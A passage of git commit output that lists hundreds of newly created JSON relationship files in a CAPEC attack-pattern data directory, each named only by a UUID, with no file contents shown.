capec/relationship/relationship--5fb0e4ef-710f-4a96-9b25-ca14dae5dadc.json create mode 100644 capec/relationship/relationship--608ce1fc-ad7d-4ce8-a477-e5fa826b090f.json create mode 100644 capec/relationship/relationship--60a630e6-d81a-445a-9fba-4432985034eb.json create mode 100644 capec/relationship/relationship--6121b719-1dbf-44cb-b2a7-70d531a099de.json create mode 100644 capec/relationship/relationship--61d1908c-b43b-4bb5-848f-b008a12c4bc6.json create mode 100644 capec/relationship/relationship--61e1e477-f922-44ee-b627-9b4c8a43841f.json create mode 100644 capec/relationship/relationship--61ec212b-f2a8-4522-a8fe-cf1c6a3a709c.json create mode 100644 capec/relationship/relationship--61f97eb6-92ac-4930-a8ef-145d7f2aa435.json create mode 100644 capec/relationship/relationship--620c1f68-4871-421e-b086-fb7f087aec4b.json create mode 100644 capec/relationship/relationship--62943b91-e6a3-4141-8467-b02dcb8536cc.json create mode 100644 capec/relationship/relationship--62b38252-4ca0-4124-a8d9-844640dc0ddc.json create mode 100644 capec/relationship/relationship--63134f93-a8ab-4f25-99e4-852f3bbdcfea.json create mode 100644 capec/relationship/relationship--6320ea75-da4c-4cfc-b6b1-adbdfedbd0af.json create mode 100644 capec/relationship/relationship--63a3e5e0-4c23-4cc0-964c-5cb7da03622b.json create mode 100644 capec/relationship/relationship--63e56fbd-3e71-4909-b55a-f855c06cd5e9.json create mode 100644 capec/relationship/relationship--64966529-b5e0-482f-996d-d189acd5e2c2.json create mode 100644 capec/relationship/relationship--64c63aad-a2ec-43f1-bd16-fa25e56f3fa0.json create mode 100644 capec/relationship/relationship--64dda55d-3c5a-4ce9-95f5-2ad9f1d90777.json create mode 100644 capec/relationship/relationship--65aca9d5-6465-4751-8a32-2d21f9902c93.json create mode 100644 capec/relationship/relationship--6617c9a5-b97d-4c1b-ad91-add566fd06f3.json create mode 100644 capec/relationship/relationship--661ecfe2-ad5b-4423-b9de-bc4207c7a310.json create mode 100644 capec/relationship/relationship--66225a03-9adb-4232-b7ac-bcad772bc785.json create mode 100644 capec/relationship/relationship--6644906e-a46d-4277-a227-55468449b656.json create mode 100644 capec/relationship/relationship--6651e0e5-1a8d-492b-9b3e-1cb8f7aada75.json create mode 100644 capec/relationship/relationship--67746908-f0b2-4fe4-94f9-06b7c35a332f.json create mode 100644 capec/relationship/relationship--679bcb7d-a2f7-4a35-8a99-323da9bfcc6f.json create mode 100644 capec/relationship/relationship--68570b2d-3374-4fb3-bb7c-1c2b6b87d903.json create mode 100644 capec/relationship/relationship--68b09834-18ce-46ff-9558-82361f5da99c.json create mode 100644 capec/relationship/relationship--68e38613-42e8-420c-9417-6b3ee3bbc892.json create mode 100644 capec/relationship/relationship--691c73d9-4383-47a1-8fed-889f5882e593.json create mode 100644 capec/relationship/relationship--699df3cb-52b6-452d-a09a-7cb661ec36da.json create mode 100644 capec/relationship/relationship--69af2945-4cbd-40ee-ae13-3b78094a0c1c.json create mode 100644 capec/relationship/relationship--69c020c1-0771-4e9f-b36f-9b3d369974a7.json create mode 100644 capec/relationship/relationship--6a141e8c-c70f-4f85-89b8-3f0a77d80c2f.json create mode 100644 capec/relationship/relationship--6a653502-0dc6-426f-b012-d0f688848013.json create mode 100644 capec/relationship/relationship--6a6db02d-7342-4850-a0b7-7d00d6f23ace.json create mode 100644 capec/relationship/relationship--6b1da7b9-e3e0-4cbb-a0fb-b35efd9915fb.json create mode 100644 capec/relationship/relationship--6b435bc5-7cc5-4045-a4e5-1f56197cf9d7.json create mode 100644 capec/relationship/relationship--6b514f14-d7fe-459e-8bcc-c624e6d1d2f2.json create mode 100644 capec/relationship/relationship--6b7c1535-3adf-434f-b86e-a8a778b3b760.json create mode 100644 capec/relationship/relationship--6c605c01-c481-4d1d-8aca-559307e5ebb1.json create mode 100644 capec/relationship/relationship--6cf9642e-3760-492e-a5eb-edd19b425bed.json create mode 100644 capec/relationship/relationship--6d02d356-8564-4b5a-8b9f-04e35159b6f4.json create mode 100644 capec/relationship/relationship--6d49e451-7651-4e70-8e46-a376b1f45c4a.json create mode 100644 capec/relationship/relationship--6d7779a9-9fec-4629-89f3-362abf58e61b.json create mode 100644 capec/relationship/relationship--6de37d0b-529b-4543-b787-6b4ed9f22a78.json create mode 100644 capec/relationship/relationship--6e058add-0fcc-4179-8dd4-ae39c312b021.json create mode 100644 capec/relationship/relationship--6ee48691-05c7-4a67-9070-4b6df955f667.json create mode 100644 capec/relationship/relationship--6ee91915-2256-49b8-93ac-fc6841d2fe3c.json create mode 100644 capec/relationship/relationship--6f07fd19-f35a-46b3-89c8-9213835e51ce.json create mode 100644 capec/relationship/relationship--7003f3ca-4461-4a85-9f24-14ad95f139a6.json create mode 100644 capec/relationship/relationship--70558577-9185-4fbc-9786-d7f780a06eb8.json create mode 100644 capec/relationship/relationship--7075ee33-e8e4-4aec-bafa-326134ab7b81.json create mode 100644 capec/relationship/relationship--7084bd3f-c383-48d5-b0da-6f1fc8d8c3a0.json create mode 100644 capec/relationship/relationship--70942835-b3bd-4245-9d50-cf8ca769df0a.json create mode 100644 capec/relationship/relationship--71334766-978c-4e8f-a180-9ead3475238b.json create mode 100644 capec/relationship/relationship--71cbc1fb-b816-4bbd-9c64-dd988f3fcf00.json create mode 100644 capec/relationship/relationship--7258ef0d-8a86-483a-b45f-0cfeaed3cd88.json create mode 100644 capec/relationship/relationship--72d350b0-5225-47f7-baf0-eb7bf6f723a7.json create mode 100644 capec/relationship/relationship--73230c2c-7e73-4b77-85f8-a92d7cf4a6a2.json create mode 100644 capec/relationship/relationship--74079054-04f5-4710-b31c-dcab62910aa7.json create mode 100644 capec/relationship/relationship--745195e4-fadd-4751-b1e3-844097302f3a.json create mode 100644 capec/relationship/relationship--74bd61aa-f7c8-4f10-8a1c-33adc298bc27.json create mode 100644 capec/relationship/relationship--74c821e2-a381-4185-b011-38540d380f0d.json create mode 100644 capec/relationship/relationship--74fa2e15-cdae-495a-9942-01806f15ac6d.json create mode 100644 capec/relationship/relationship--75675b2e-e3b6-4fb1-8ca5-6620f4965b2e.json create mode 100644 capec/relationship/relationship--75cedfaa-3c9f-4d80-909e-6bbd011bf5aa.json create mode 100644 capec/relationship/relationship--75ec102d-bbc8-4693-87a9-1d2bdbae06ed.json create mode 100644 capec/relationship/relationship--75f29bbb-4c75-473b-b539-94f37ac9dd22.json create mode 100644 capec/relationship/relationship--7612b2fc-c9b9-4a83-ba97-72481e466395.json create mode 100644 capec/relationship/relationship--762c6f91-15c4-4702-9f8c-9f3c573029eb.json create mode 100644 capec/relationship/relationship--766d79dd-2f1c-40d2-bad8-1bcedb71e216.json create mode 100644 capec/relationship/relationship--768422f2-054e-4557-9e91-91263b11fbc0.json create mode 100644 capec/relationship/relationship--76e14906-b13a-49dd-b240-38ba08c42eaf.json create mode 100644 capec/relationship/relationship--77174f86-8a8d-442b-a432-c71245fddf54.json create mode 100644 capec/relationship/relationship--77c41198-2391-422c-81fa-0ae498f0d2bf.json create mode 100644 capec/relationship/relationship--77f0bb36-228a-4921-abd2-9812980193c8.json create mode 100644 capec/relationship/relationship--783278fb-0cbe-446a-a559-7d114e06706a.json create mode 100644 capec/relationship/relationship--783d775a-411a-43bd-b200-f4740432645c.json create mode 100644 capec/relationship/relationship--7857a887-19b6-4c8a-8643-4d442a70e0fa.json create mode 100644 capec/relationship/relationship--789b1bc9-99a8-4b08-a8bc-f1de0cf0ac74.json create mode 100644 capec/relationship/relationship--78b25ab4-16a8-48d9-a2cb-2a01bee50d6f.json create mode 100644 capec/relationship/relationship--78b35bc5-b6e0-460c-9fa3-fc47a4ff64f9.json create mode 100644 capec/relationship/relationship--78e4fddf-de75-4b28-ae1e-1baf0fd5ed17.json create mode 100644 capec/relationship/relationship--78ebf4ad-2c8b-4125-96ec-04f668043e85.json create mode 100644 capec/relationship/relationship--795d43b4-83aa-41d3-8265-230037287312.json create mode 100644 capec/relationship/relationship--79bbd502-a2fb-4f28-83b4-d95183490f1c.json create mode 100644 capec/relationship/relationship--79de9748-e935-49a4-b7ed-2962df30e2f5.json create mode 100644 capec/relationship/relationship--79faf469-f2d1-4818-ae18-9c928898c7da.json create mode 100644 capec/relationship/relationship--7a04dce2-d860-4de7-972d-835d61baed06.json create mode 100644 capec/relationship/relationship--7a278d54-2787-42e3-9f18-7b64e39e6379.json create mode 100644 capec/relationship/relationship--7a5c3fcf-46fd-4fec-8a86-ab6f4e3d40f2.json create mode 100644 capec/relationship/relationship--7ad210dd-09f6-4e1b-b8a2-e3aa2417b539.json create mode 100644 capec/relationship/relationship--7b2520de-2853-4624-ae3c-2068197b5783.json create mode 100644 capec/relationship/relationship--7b381f66-1024-42c8-8af0-527538460991.json create mode 100644 capec/relationship/relationship--7b385832-942e-4c6c-872f-557dc3452a35.json create mode 100644 capec/relationship/relationship--7b417e0b-dcbf-4266-b671-8b1a81d666b7.json create mode 100644 capec/relationship/relationship--7c2427c4-5e7c-48bc-b418-de45d3feb416.json create mode 100644 capec/relationship/relationship--7c272f72-b4b5-498c-ac80-301414134dd5.json create mode 100644 capec/relationship/relationship--7c55f273-53d1-4dfa-a48e-8e6d30245434.json create mode 100644 capec/relationship/relationship--7cc4b914-4dc2-4b09-9a7f-87a392e99799.json create mode 100644 capec/relationship/relationship--7cf53966-8019-49f9-b7f3-5c084e4b9041.json create mode 100644 capec/relationship/relationship--7cfaadf0-8cef-4fc6-948c-b787bc4de4bd.json create mode 100644 capec/relationship/relationship--7d4c1719-841f-4bc3-a29a-f6774a701cd4.json create mode 100644 capec/relationship/relationship--7d63cc56-ed2c-4c5b-81c6-673180a95326.json create mode 100644 capec/relationship/relationship--7d81629d-bdda-4bc4-85b8-ea50eea6ee12.json create mode 100644 capec/relationship/relationship--7da0fb75-3a9c-41b8-9e21-5ab6f33f492b.json create mode 100644 capec/relationship/relationship--7dc19342-6d0d-4069-8beb-bf6eebf70c6e.json create mode 100644 capec/relationship/relationship--7dc7508c-c157-4f37-8dce-a9e510510a67.json create mode 100644 capec/relationship/relationship--7e1b0d46-4b00-4683-8ace-0e1259b91a53.json create mode 100644 capec/relationship/relationship--7ec0c832-fcae-437d-a36d-2c55aed229e0.json create mode 100644 capec/relationship/relationship--7f31dd17-08ce-4ce9-a6ab-af300137930a.json create mode 100644 capec/relationship/relationship--7f33bb99-d999-44c2-a4eb-14c0c880d608.json create mode 100644 capec/relationship/relationship--7f384ad7-e149-430e-a6cd-4166397caea2.json create mode 100644 capec/relationship/relationship--803bea86-c5c1-4b33-a008-37d45227bbc9.json create mode 100644 capec/relationship/relationship--806949e1-cbc3-4289-a9fb-4640545aefa5.json create mode 100644 capec/relationship/relationship--811e822f-16cf-4141-af34-ece4c8f64959.json create mode 100644 capec/relationship/relationship--81305fb7-b358-42db-818e-1ffe0161cd24.json create mode 100644 capec/relationship/relationship--815e4cb8-f89c-47bf-b28a-1af4e3f43a48.json create mode 100644 capec/relationship/relationship--818c7ba6-63c6-459c-9d04-52f2215fcfb6.json create mode 100644 capec/relationship/relationship--81c7a7f1-9308-4649-aa22-24e65e541d6c.json create mode 100644 capec/relationship/relationship--81d26642-80cd-46b4-b990-5e1fcc9ccc5e.json create mode 100644 capec/relationship/relationship--81eac75b-00a6-48c3-87f6-c8f490b8074c.json create mode 100644 capec/relationship/relationship--81ef7c1f-e9cc-4c67-8622-6dccca0fbd6d.json create mode 100644 capec/relationship/relationship--8220a682-70a9-4d9d-9099-97188386d650.json create mode 100644 capec/relationship/relationship--829cd726-e81c-46bb-929a-968d072b6337.json create mode 100644 capec/relationship/relationship--82d42851-afd1-4779-8f44-f9216f67318f.json create mode 100644 capec/relationship/relationship--83538c7f-410a-4fb8-8b6a-3de168066b99.json create mode 100644 capec/relationship/relationship--837581cd-38d6-4ae8-881a-6e24f3d91501.json create mode 100644 capec/relationship/relationship--8395c8af-2dba-4608-b79e-25a94a8e8d12.json create mode 100644 capec/relationship/relationship--83bb94b7-c7bf-407b-ad77-5411a93c2090.json create mode 100644 capec/relationship/relationship--83ee75c4-f664-4d85-a75d-c147df341d98.json create mode 100644 capec/relationship/relationship--845db3a7-86b4-4ea8-a02e-59dcfef32685.json create mode 100644 capec/relationship/relationship--84db461f-9151-492a-916c-180f978934e9.json create mode 100644 capec/relationship/relationship--851e123e-3787-49ae-a913-2f5b740e4449.json create mode 100644 capec/relationship/relationship--865901c4-f6d2-4b7d-8779-72825f4b6805.json create mode 100644 capec/relationship/relationship--86d2423d-06ba-4b1d-91ad-b4c3001e5963.json create mode 100644 capec/relationship/relationship--86d3766f-0a05-43b2-b51d-b7f6759dd217.json create mode 100644 capec/relationship/relationship--8727fb4f-f025-4007-8f5b-ef9421884453.json create mode 100644 capec/relationship/relationship--87288ea2-a91a-4195-acc3-ac477bd9fb9e.json create mode 100644 capec/relationship/relationship--8789e6c2-c33c-4049-8fea-9582e0f10cb6.json create mode 100644 capec/relationship/relationship--87adce17-6faa-4dd1-b494-2aad494d524d.json create mode 100644 capec/relationship/relationship--8888fb2f-589c-4fad-b1c4-a650025959fe.json create mode 100644 capec/relationship/relationship--88cab279-e362-42a3-b9a9-be4353aa826f.json create mode 100644 capec/relationship/relationship--88df8824-2a9a-484a-a923-ab701e094915.json create mode 100644 capec/relationship/relationship--896afb75-0f0d-4181-ae82-46c064633811.json create mode 100644 capec/relationship/relationship--89927e5a-277d-4f6a-b091-3d0bf0e6bfdd.json create mode 100644 capec/relationship/relationship--8a19cac6-1d9f-4cc4-8268-8b2724964e81.json create mode 100644 capec/relationship/relationship--8a25e165-d6c1-44a3-bfb4-6cb12ba12e27.json create mode 100644 capec/relationship/relationship--8a4b7fe3-ad82-4086-9b30-6e5efcadea92.json create mode 100644 capec/relationship/relationship--8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5.json create mode 100644 capec/relationship/relationship--8c21c97b-4442-4427-91f7-ed7820bde031.json create mode 100644 capec/relationship/relationship--8c3415e0-7622-4e5d-b63e-c5543b698140.json create mode 100644 capec/relationship/relationship--8cd24df9-fbbc-45e6-9090-777c7bae0516.json create mode 100644 capec/relationship/relationship--8d474304-906e-403d-ae0f-ae6720b2d8bd.json create mode 100644 capec/relationship/relationship--8d51a424-be03-4360-86e5-8b52593e1b9d.json create mode 100644 capec/relationship/relationship--8deebf71-a2a6-4b9f-b4da-0234b9d83b46.json create mode 100644 capec/relationship/relationship--8e7b2d66-fa6a-4ae8-ad81-c11393d31472.json create mode 100644 capec/relationship/relationship--8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c.json create mode 100644 capec/relationship/relationship--8f12378e-8d19-4157-b06e-8658c0fed625.json create mode 100644 capec/relationship/relationship--8f235db5-fa5f-4639-8f92-66ee13f93eca.json create mode 100644 capec/relationship/relationship--8f47f09d-2b56-4f15-b305-6b27f49fbc94.json create mode 100644 capec/relationship/relationship--8fcd0914-f3d0-4b0f-9b42-9159f24c842d.json create mode 100644 capec/relationship/relationship--8ffe3d92-6215-4893-93ed-a0b59d44c7ef.json create mode 100644 capec/relationship/relationship--90451497-c256-4016-b419-27ccb799bf61.json create mode 100644 capec/relationship/relationship--904606f7-adeb-4c0f-aabb-02122345431a.json create mode 100644 capec/relationship/relationship--90a04154-3ee7-48e9-a06c-f491ab3828e6.json create mode 100644 capec/relationship/relationship--90aa64d8-d944-465e-a4f2-e675c4db1e3d.json create mode 100644 capec/relationship/relationship--90d7b81d-d132-4a5f-b3d4-40f3cec2c222.json create mode 100644 capec/relationship/relationship--91018696-0020-40cb-8d37-c1b79a559ea3.json create mode 100644 capec/relationship/relationship--917ea1c5-68c8-4efa-b1aa-57e3b3347b22.json create mode 100644 capec/relationship/relationship--91c36161-4a18-4529-8808-c0c86bf202c1.json create mode 100644 capec/relationship/relationship--91f8ddb2-7263-40a3-8ec1-becbc72ff0ee.json create mode 100644 capec/relationship/relationship--926ec109-c4a7-4b3c-937f-9b24ebec9ed7.json create mode 100644 capec/relationship/relationship--927081e8-eca0-40a8-8c97-382dfcb06c30.json create mode 100644 capec/relationship/relationship--92c11af4-116d-4550-ba14-1b9ab2fd48a0.json create mode 100644 capec/relationship/relationship--92ef7475-3bec-49f5-945c-8fa2019350ef.json create mode 100644 capec/relationship/relationship--9304375a-3ec0-4ab2-9134-a129993052b6.json create mode 100644 capec/relationship/relationship--93532399-3fea-4db4-9111-c588139409ff.json create mode 100644 capec/relationship/relationship--93e11447-0480-49d7-aaad-956638fa7bf2.json create mode 100644 capec/relationship/relationship--93e582b6-8370-4188-bdcf-2158965b6ac7.json create mode 100644 capec/relationship/relationship--943fef2d-bf83-4cb0-b4cc-ac89d5c9b082.json create mode 100644 capec/relationship/relationship--94846665-2cb7-4efe-a38f-f8bdf646bb70.json create mode 100644 capec/relationship/relationship--94a20952-5cb4-48c2-bccc-ab2ec6376b59.json create mode 100644 capec/relationship/relationship--94ce1a99-d4d8-479e-bcb5-d153a4d61f79.json create mode 100644 capec/relationship/relationship--95146f5b-2bf7-47fb-a30c-9c8176408c91.json create mode 100644 capec/relationship/relationship--956c0201-08bf-474c-ab45-a211617432ba.json create mode 100644 capec/relationship/relationship--95cf9e22-8502-4284-8803-e6b51f5e3520.json create mode 100644 capec/relationship/relationship--967de655-db81-4012-959a-55f1a9673fc9.json create mode 100644 capec/relationship/relationship--97626d09-376c-4acf-b43a-64f496130d56.json create mode 100644 capec/relationship/relationship--978d5ab4-e6d1-42c0-9135-320cebd99221.json create mode 100644 capec/relationship/relationship--97f8c959-d8f0-4569-99bb-cd3016c7c5bc.json create mode 100644 capec/relationship/relationship--9816bf94-06d8-4eb0-9d7d-6bf0f30107e5.json create mode 100644 capec/relationship/relationship--982673e3-3d4c-4c23-850f-c844a41e83a0.json create mode 100644 capec/relationship/relationship--98898885-8ffc-419e-b0ce-9e8f33f19b3c.json create mode 100644 capec/relationship/relationship--98e0dbe6-a94a-4303-9459-def28183f15b.json create mode 100644 capec/relationship/relationship--98e84fa7-8d01-47f0-b042-01de86a716a5.json create mode 100644 capec/relationship/relationship--99ab01a2-3d66-43bc-8f26-933c354de81b.json create mode 100644 capec/relationship/relationship--9a8a083e-85bb-46b5-83ff-791e98fdd243.json create mode 100644 capec/relationship/relationship--9b001554-1162-4f14-acbc-ae6fabb9dee4.json create mode 100644 capec/relationship/relationship--9b13aeb5-0061-4faf-a904-f6284e70689e.json create mode 100644 capec/relationship/relationship--9b6f79fa-271d-4307-90be-f07986141adf.json create mode 100644 capec/relationship/relationship--9b804090-8565-4f9a-b785-46ad01aab0b6.json create mode 100644 capec/relationship/relationship--9b8604b5-deb3-48af-a72b-c84250ac0317.json create mode 100644 capec/relationship/relationship--9b940f35-fced-43d4-b905-57b91eb79f96.json create mode 100644 capec/relationship/relationship--9bd389e5-7353-481d-a15f-0dd86ff65e04.json create mode 100644 capec/relationship/relationship--9c42b260-3a66-4a10-a9f2-92c5bca59e58.json create mode 100644 capec/relationship/relationship--9c5f4f0c-c505-4073-9be5-4b61f35fe38e.json create mode 100644 capec/relationship/relationship--9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7.json create mode 100644 capec/relationship/relationship--9dccfaf7-028b-4ade-a84e-fb04748d4e00.json create mode 100644 capec/relationship/relationship--9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1.json create mode 100644 capec/relationship/relationship--9e5fb7cb-c6d3-46ad-bab1-db9db3c164dd.json create mode 100644 capec/relationship/relationship--9ea36268-c2cd-4bb6-9a13-9fd992be4272.json create mode 100644 capec/relationship/relationship--9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3.json create mode 100644 capec/relationship/relationship--9f18e491-5633-4ed9-ac64-4c31bef0b762.json create mode 100644 capec/relationship/relationship--9fa5c9f5-e86e-4150-86a2-9e4681532661.json create mode 100644 capec/relationship/relationship--9fdf5739-9951-4e6d-a393-920bca359c7b.json create mode 100644 capec/relationship/relationship--a05b8a5c-7e75-4870-8aef-4e433c3e2a87.json create mode 100644 capec/relationship/relationship--a1307e4c-a783-4836-b078-188634674a29.json create mode 100644 capec/relationship/relationship--a1b0fa62-f694-453e-9183-9e0e3bd73735.json create mode 100644 capec/relationship/relationship--a1fd5ca5-0589-4c9d-8841-bf0640514b20.json create mode 100644 capec/relationship/relationship--a2bf74d1-dba2-4b85-b66c-c35fc90c1ee5.json create mode 100644 capec/relationship/relationship--a2e6af07-0ede-4f9b-a34b-e30833fd8b5e.json create mode 100644 capec/relationship/relationship--a368132d-2ecf-40b4-8ce3-5f5933f296fd.json create mode 100644 capec/relationship/relationship--a39c75cf-553e-4ede-a010-3ce094d2b7c2.json create mode 100644 capec/relationship/relationship--a406c81b-ff0d-43ee-8744-d73583ca0d57.json create mode 100644 capec/relationship/relationship--a40d425c-439a-4eb3-af1e-e29e9c8a0152.json create mode 100644 capec/relationship/relationship--a430a05b-fd21-408e-9e44-d91dbf00b0f9.json create mode 100644 capec/relationship/relationship--a443ace7-3d84-46bd-8fb0-ce9c208edef9.json create mode 100644 capec/relationship/relationship--a459d059-1af8-49fa-b08d-8a57a8d1be8c.json create mode 100644 capec/relationship/relationship--a4607e08-74ba-474f-84b1-b14053c9c7fa.json create mode 100644 capec/relationship/relationship--a4a643b5-7a39-4bf8-ab5c-d768adc88b0c.json create mode 100644 capec/relationship/relationship--a4ace4df-6367-4a85-b7a9-d39c0066ff3b.json create mode 100644 capec/relationship/relationship--a5cd32a1-ba17-4566-8c53-384cfcfd19bd.json create mode 100644 capec/relationship/relationship--a5feef4d-dd12-465c-a1f4-54a66811f051.json create mode 100644 capec/relationship/relationship--a62a21f8-c485-4c1e-9f87-9b46d915c0cd.json create mode 100644 capec/relationship/relationship--a650e22c-56f2-45a6-b7a0-902313c33b44.json create mode 100644 capec/relationship/relationship--a68920c3-bc51-419d-aeab-76c0de9d2e7a.json create mode 100644 capec/relationship/relationship--a68fcccc-ef4a-49a1-8f59-93d8dd7805f1.json create mode 100644 capec/relationship/relationship--a6a06b65-e7de-417e-bd2a-4f4956c21f02.json create mode 100644 capec/relationship/relationship--a7601573-6a34-404f-a4fa-bd61bafa7224.json create mode 100644 capec/relationship/relationship--a76c2831-eff2-476f-8559-da6ccb5ff01a.json create mode 100644 capec/relationship/relationship--a7bf4756-6477-4cdc-bbc6-bacb52b3df40.json create mode 100644 capec/relationship/relationship--a8321ce6-7aa9-4ff1-b278-0b9fbd962b91.json create mode 100644 capec/relationship/relationship--a84d6185-2db4-497a-9695-e47d54880e22.json create mode 100644 capec/relationship/relationship--a8538d8c-fff5-4de4-a592-413face454fa.json create mode 100644 capec/relationship/relationship--a8577b37-fca4-43f3-a947-a0e9a81ff263.json create mode 100644 capec/relationship/relationship--a8bb5bce-434d-461f-812c-eb23c148b075.json create mode 100644 capec/relationship/relationship--a99a314c-2ec0-4a3e-b1cc-c03761a4577a.json create mode 100644 capec/relationship/relationship--a9aeaf08-5aba-42dd-91d1-bcc39d45f830.json create mode 100644 capec/relationship/relationship--a9b907b4-52c2-42f8-a7ba-52b608c41cdc.json create mode 100644 capec/relationship/relationship--a9ddebe0-1aaa-4113-b4af-d3be1bb746d0.json create mode 100644 capec/relationship/relationship--a9ebb372-0dce-4558-9cb8-ea6454d9b79b.json create mode 100644 capec/relationship/relationship--aa7d6d83-e79a-4a8d-a59e-f3592ca65b89.json create mode 100644 capec/relationship/relationship--aa8b1d29-f699-40ae-ae85-528d22562479.json create mode 100644 capec/relationship/relationship--aacfa64c-2007-4b20-a791-3207866e0565.json create mode 100644 capec/relationship/relationship--ab4e9f7b-ce52-40e6-b090-746b9e36a5db.json create mode 100644 capec/relationship/relationship--abe12e18-a9a3-45fa-be8f-aa5caad45774.json create mode 100644 capec/relationship/relationship--abf2549f-6e96-4043-b6dc-f2ad2ba3ea61.json create mode 100644 capec/relationship/relationship--abfc9759-5f7a-4248-b276-110e96beb9d8.json create mode 100644 capec/relationship/relationship--ac2fc394-d6b0-4a44-b765-9fe73123b253.json create mode 100644 capec/relationship/relationship--ac38c85d-0695-4c49-8b5b-d3c521ec56dd.json create mode 100644 capec/relationship/relationship--ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c.json create mode 100644 capec/relationship/relationship--ac81cf41-7bdc-4415-a2af-288452a727be.json create mode 100644 capec/relationship/relationship--ad5a9c4f-dec3-41d6-b5af-dec89b0bf143.json create mode 100644 capec/relationship/relationship--ad9f9eb4-b077-4187-b75e-5561e357dc68.json create mode 100644 capec/relationship/relationship--adc43532-79b6-4deb-98eb-2200ee6be8e5.json create mode 100644 capec/relationship/relationship--adceacd0-9e5e-4879-9dfc-db9c1be833b9.json create mode 100644 capec/relationship/relationship--ae108410-45fa-495c-8900-bdbbfb9b1fc6.json create mode 100644 capec/relationship/relationship--aedc6d88-0ce3-4a62-a4c0-8f223d460a4c.json create mode 100644 capec/relationship/relationship--b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2.json create mode 100644 capec/relationship/relationship--b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2.json create mode 100644 capec/relationship/relationship--b12d3857-9aea-4d9b-b610-b8f2ab7a77ef.json create mode 100644 capec/relationship/relationship--b146ae5b-3105-49dd-946f-8ad19f54a35a.json create mode 100644 capec/relationship/relationship--b1906b70-d693-4d9b-bd12-ac22eb49e5fe.json create mode 100644 capec/relationship/relationship--b2123192-f6e4-4402-b8aa-3256e75fb07c.json create mode 100644 capec/relationship/relationship--b2f2e038-a80c-4cf3-b3b0-bfc4279080a0.json create mode 100644 capec/relationship/relationship--b32b8dd1-e256-46d1-843f-7a038a0c9afb.json create mode 100644 capec/relationship/relationship--b3400a5a-bf24-45d1-942d-423db78369c8.json create mode 100644 capec/relationship/relationship--b351048d-671f-4e59-8dfd-d6c494ec0a3d.json create mode 100644 capec/relationship/relationship--b3801462-8d46-4a12-8f43-022579f9a1d1.json create mode 100644 capec/relationship/relationship--b3e1c5c7-5f3b-41e2-9fe4-f5bea1789010.json create mode 100644 capec/relationship/relationship--b3f766e9-52da-4e96-b4e2-ceabba6c233c.json create mode 100644 capec/relationship/relationship--b4102a59-40e2-4b12-9a6c-f1f3747926e5.json create mode 100644 capec/relationship/relationship--b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5.json create mode 100644 capec/relationship/relationship--b4584b1d-d9de-42d3-85ee-c0cd0d5a2e0b.json create mode 100644 capec/relationship/relationship--b4b6093c-6dee-4797-a60d-79cda0f1293b.json create mode 100644 capec/relationship/relationship--b5155ed4-8f92-4832-b65a-80ac64463a0a.json create mode 100644 capec/relationship/relationship--b54d0e01-4c7b-4f6b-b3eb-570663235131.json create mode 100644 capec/relationship/relationship--b5a8d903-9fac-4d31-be99-93da4e1b8d06.json create mode 100644 capec/relationship/relationship--b6f089ae-d8b8-4e88-a730-5eff3b909673.json create mode 100644 capec/relationship/relationship--b714a160-45ab-42cc-8ed2-9e2f3b91b07b.json create mode 100644 capec/relationship/relationship--b790204c-09bb-42ab-af79-4dfe85f6a848.json create mode 100644 capec/relationship/relationship--b7a2284e-2098-4d9c-9fd2-051cb7581e03.json create mode 100644 capec/relationship/relationship--b7a582bf-6fc4-41b5-aa82-24a573fc080f.json create mode 100644 capec/relationship/relationship--b7ce42f6-518b-4c8e-8da7-ae32c04486c8.json create mode 100644 capec/relationship/relationship--b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc.json create mode 100644 capec/relationship/relationship--b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db.json create mode 100644 capec/relationship/relationship--b8feb49d-0da7-4086-9ff4-922eda80d0d1.json create mode 100644 capec/relationship/relationship--b914cf9d-94aa-417c-88b4-819c3934159f.json create mode 100644 capec/relationship/relationship--b91617f1-b967-4057-9b2d-257754101ebf.json create mode 100644 capec/relationship/relationship--b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7.json create mode 100644 capec/relationship/relationship--b97f03f1-ddab-49e7-81c2-c49afb2dde4e.json create mode 100644 capec/relationship/relationship--b98b347f-fe01-4005-96a1-407ba02335de.json create mode 100644 capec/relationship/relationship--ba665997-3d38-41e2-95e3-4426e254e080.json create mode 100644 capec/relationship/relationship--ba8d1163-39d3-4a85-907a-f806c1d6678a.json create mode 100644 capec/relationship/relationship--bae1d426-0299-4081-97f5-202119a241f0.json create mode 100644 capec/relationship/relationship--bc1c0d60-d9b5-4a17-84a5-e572772c76ea.json create mode 100644 capec/relationship/relationship--bce6dd14-bef7-481a-9104-ce0713480b0b.json create mode 100644 capec/relationship/relationship--bd42a550-a4da-4086-a5c8-c1e27cb48ac0.json create mode 100644 capec/relationship/relationship--bdbe3425-bc01-42c2-ae13-4307f4300cf8.json create mode 100644 capec/relationship/relationship--be3c1d6b-d331-4353-b22d-33fc18ee979a.json create mode 100644 capec/relationship/relationship--be3fde87-7de1-4c5d-a814-8e658302bc63.json create mode 100644 capec/relationship/relationship--be4ac31b-9a45-48cb-8545-c040b42c44c7.json create mode 100644 capec/relationship/relationship--bef63288-a9ec-46f1-9212-708d0ea32d22.json create mode 100644 capec/relationship/relationship--bf19970b-a040-4386-9015-519164a84e3e.json create mode 100644 capec/relationship/relationship--bf2dd714-1db9-4c9b-b2e7-4ef7380a4319.json create mode 100644 capec/relationship/relationship--bff251e7-c45a-4a47-84f1-4dc948e663a8.json create mode 100644 capec/relationship/relationship--bfffc983-2c3b-4fba-9fad-62fafafffdb1.json create mode 100644 capec/relationship/relationship--c00c72a0-8eb1-4b19-b7d1-858ec5b569d5.json create mode 100644 capec/relationship/relationship--c04c55ea-7aca-4a53-8dfa-41c78e806bbe.json create mode 100644 capec/relationship/relationship--c054bc28-f5d2-42a2-aa76-11e6f91a034b.json create mode 100644 capec/relationship/relationship--c095e46c-44ee-4328-9514-b82653c95e7d.json create mode 100644 capec/relationship/relationship--c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba.json create mode 100644 